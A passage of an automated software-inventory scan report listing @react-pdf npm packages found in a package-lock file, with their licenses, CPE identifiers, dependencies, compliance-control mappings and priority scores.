"Package discovered: @react-pdf/font 2.5.2", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "15064a64821e35da", + "name": "@react-pdf/font", + "version": "2.5.2", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@react-pdf\\/font:\\@react-pdf\\/font:2.5.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@react-pdf\\/font:\\@react_pdf\\/font:2.5.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@react_pdf\\/font:\\@react-pdf\\/font:2.5.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@react_pdf\\/font:\\@react_pdf\\/font:2.5.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@react:\\@react-pdf\\/font:2.5.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@react:\\@react_pdf\\/font:2.5.2:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40react-pdf/font@2.5.2", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@react-pdf/font/-/font-2.5.2.tgz", + "integrity": "sha512-Ud0EfZ2FwrbvwAWx8nz+KKLmiqACCH9a/N/xNDOja0e/YgSnqTpuyHegFBgIMKjuBtO5dNvkb4dXkxAhGe/ayw==", + "dependencies": { + "@babel/runtime": "^7.20.13", + "@react-pdf/types": "^2.6.0", + "cross-fetch": "^3.1.5", + "fontkit": "^2.0.2", + "is-url": "^1.2.4" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "325345669fb318b9", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @react-pdf/font 4.0.8", + "title": "@react-pdf/font 4.0.8", + "description": "Package discovered: @react-pdf/font 4.0.8", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "19aa56c736ba6f4e", + "name": "@react-pdf/font", + "version": "4.0.8", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@react-pdf\\/font:\\@react-pdf\\/font:4.0.8:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@react-pdf\\/font:\\@react_pdf\\/font:4.0.8:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@react_pdf\\/font:\\@react-pdf\\/font:4.0.8:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@react_pdf\\/font:\\@react_pdf\\/font:4.0.8:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@react:\\@react-pdf\\/font:4.0.8:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@react:\\@react_pdf\\/font:4.0.8:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40react-pdf/font@4.0.8", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@react-pdf/font/-/font-4.0.8.tgz", + "integrity": "sha512-deNd+emtZAJho1IlzKL9bRoLAGv/6oXOIKO2oZfs4RuXUrK1onLHbJO7e2YoVLPFP/sQxisRTnzdJFtd35iKwA==", + "dependencies": { + "@react-pdf/pdfkit": "^5.1.1", + "@react-pdf/types": "^2.11.1", + "fontkit": "^2.0.2", + "is-url": "^1.2.4" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "a9ddc08bb5c72c17", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @react-pdf/image 2.3.6", + "title": "@react-pdf/image 2.3.6", + "description": "Package discovered: @react-pdf/image 2.3.6", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "e700f7d1572a4159", + "name": "@react-pdf/image", + "version": "2.3.6", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@react-pdf\\/image:\\@react-pdf\\/image:2.3.6:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@react-pdf\\/image:\\@react_pdf\\/image:2.3.6:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@react_pdf\\/image:\\@react-pdf\\/image:2.3.6:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@react_pdf\\/image:\\@react_pdf\\/image:2.3.6:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@react:\\@react-pdf\\/image:2.3.6:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@react:\\@react_pdf\\/image:2.3.6:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40react-pdf/image@2.3.6", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@react-pdf/image/-/image-2.3.6.tgz", + "integrity": "sha512-7iZDYZrZlJqNzS6huNl2XdMcLFUo68e6mOdzQeJ63d5eApdthhSHBnkGzHfLhH5t8DCpZNtClmklzuLL63ADfw==", + "dependencies": { + "@babel/runtime": "^7.20.13", + "@react-pdf/png-js": "^2.3.1", + "cross-fetch": "^3.1.5", + "jay-peg": "^1.0.2" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "751c0bb9092b6d5a", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @react-pdf/layout 3.13.0", + "title": "@react-pdf/layout 3.13.0", + "description": "Package discovered: @react-pdf/layout 3.13.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "bfc90f0951098a84", + "name": "@react-pdf/layout", + "version": "3.13.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@react-pdf\\/layout:\\@react-pdf\\/layout:3.13.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@react-pdf\\/layout:\\@react_pdf\\/layout:3.13.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@react_pdf\\/layout:\\@react-pdf\\/layout:3.13.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@react_pdf\\/layout:\\@react_pdf\\/layout:3.13.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@react:\\@react-pdf\\/layout:3.13.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@react:\\@react_pdf\\/layout:3.13.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40react-pdf/layout@3.13.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@react-pdf/layout/-/layout-3.13.0.tgz", + "integrity": "sha512-lpPj/EJYHFOc0ALiJwLP09H28B4ADyvTjxOf67xTF+qkWd+dq1vg7dw3wnYESPnWk5T9NN+HlUenJqdYEY9AvA==", + "dependencies": { + "@babel/runtime": "^7.20.13", + "@react-pdf/fns": "2.2.1", + "@react-pdf/image": "^2.3.6", + "@react-pdf/pdfkit": "^3.2.0", + "@react-pdf/primitives": "^3.1.1", + "@react-pdf/stylesheet": "^4.3.0", + "@react-pdf/textkit": "^4.4.1", + "@react-pdf/types": "^2.6.0", + "cross-fetch": "^3.1.5", + "emoji-regex": "^10.3.0", + "queue": "^6.0.1", + "yoga-layout": "^2.0.1" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "18357a3fbdd2a393", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @react-pdf/pdfkit 3.2.0", + "title": "@react-pdf/pdfkit 3.2.0", + "description": "Package discovered: @react-pdf/pdfkit 3.2.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "3f225c34b86f8909", + "name": "@react-pdf/pdfkit", + "version": "3.2.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@react-pdf\\/pdfkit:\\@react-pdf\\/pdfkit:3.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@react-pdf\\/pdfkit:\\@react_pdf\\/pdfkit:3.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@react_pdf\\/pdfkit:\\@react-pdf\\/pdfkit:3.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@react_pdf\\/pdfkit:\\@react_pdf\\/pdfkit:3.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@react:\\@react-pdf\\/pdfkit:3.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@react:\\@react_pdf\\/pdfkit:3.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40react-pdf/pdfkit@3.2.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@react-pdf/pdfkit/-/pdfkit-3.2.0.tgz", + "integrity": "sha512-OBfCcnTC6RpD9uv9L2woF60Zj1uQxhLFzTBXTdcYE9URzPE/zqXIyzpXEA4Vf3TFbvBCgFE2RzJ2ZUS0asq7yA==", + "dependencies": { + "@babel/runtime": "^7.20.13", + "@react-pdf/png-js": "^2.3.1", + "browserify-zlib": "^0.2.0", + "crypto-js": "^4.2.0", + "fontkit": "^2.0.2", + "jay-peg": "^1.0.2", + "vite-compatible-readable-stream": "^3.6.1" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "a9e659420a7b937a", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @react-pdf/pdfkit 5.1.1", + "title": "@react-pdf/pdfkit 5.1.1", + "description": "Package discovered: @react-pdf/pdfkit 5.1.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "24d45580f4c0f7bb", + "name": "@react-pdf/pdfkit", + "version": "5.1.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@react-pdf\\/pdfkit:\\@react-pdf\\/pdfkit:5.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@react-pdf\\/pdfkit:\\@react_pdf\\/pdfkit:5.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@react_pdf\\/pdfkit:\\@react-pdf\\/pdfkit:5.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@react_pdf\\/pdfkit:\\@react_pdf\\/pdfkit:5.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@react:\\@react-pdf\\/pdfkit:5.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@react:\\@react_pdf\\/pdfkit:5.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40react-pdf/pdfkit@5.1.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@react-pdf/pdfkit/-/pdfkit-5.1.1.tgz", + "integrity": "sha512-wNcdSsNlNYyGHGAgIdt453egBF7fiF9UxpRlklUfVvu8OWCrUppG9xiUrPLVoKiqWet5tMi0w6LmuFUJuYqjEg==", + "dependencies": { + "@babel/runtime": "^7.20.13", + "@noble/ciphers": "^1.0.0", + "@noble/hashes": "^1.6.0", + "browserify-zlib": "^0.2.0", + "fontkit": "^2.0.2", + "jay-peg": "^1.1.1", + "js-md5": "^0.8.3", + "linebreak": "^1.1.0", + "png-js": "^2.0.0", + "vite-compatible-readable-stream": "^3.6.1" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "aadf20f14ed3a63a", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @react-pdf/png-js 2.3.1", + "title": "@react-pdf/png-js 2.3.1", + "description": "Package discovered: @react-pdf/png-js 2.3.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "ecd22ec88d1d110f", + "name": "@react-pdf/png-js", + "version": "2.3.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@react-pdf\\/png-js:\\@react-pdf\\/png-js:2.3.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@react-pdf\\/png-js:\\@react_pdf\\/png_js:2.3.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@react_pdf\\/png_js:\\@react-pdf\\/png-js:2.3.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@react_pdf\\/png_js:\\@react_pdf\\/png_js:2.3.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@react-pdf\\/png:\\@react-pdf\\/png-js:2.3.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@react-pdf\\/png:\\@react_pdf\\/png_js:2.3.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@react_pdf\\/png:\\@react-pdf\\/png-js:2.3.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@react_pdf\\/png:\\@react_pdf\\/png_js:2.3.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@react:\\@react-pdf\\/png-js:2.3.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@react:\\@react_pdf\\/png_js:2.3.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40react-pdf/png-js@2.3.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@react-pdf/png-js/-/png-js-2.3.1.tgz", + "integrity": "sha512-pEZ18I4t1vAUS4lmhvXPmXYP4PHeblpWP/pAlMMRkEyP7tdAeHUN7taQl9sf9OPq7YITMY3lWpYpJU6t4CZgZg==", + "dependencies": { + "browserify-zlib": "^0.2.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "4f8cb527e021a217", + "ruleId": "SBOM.PACKAGE", 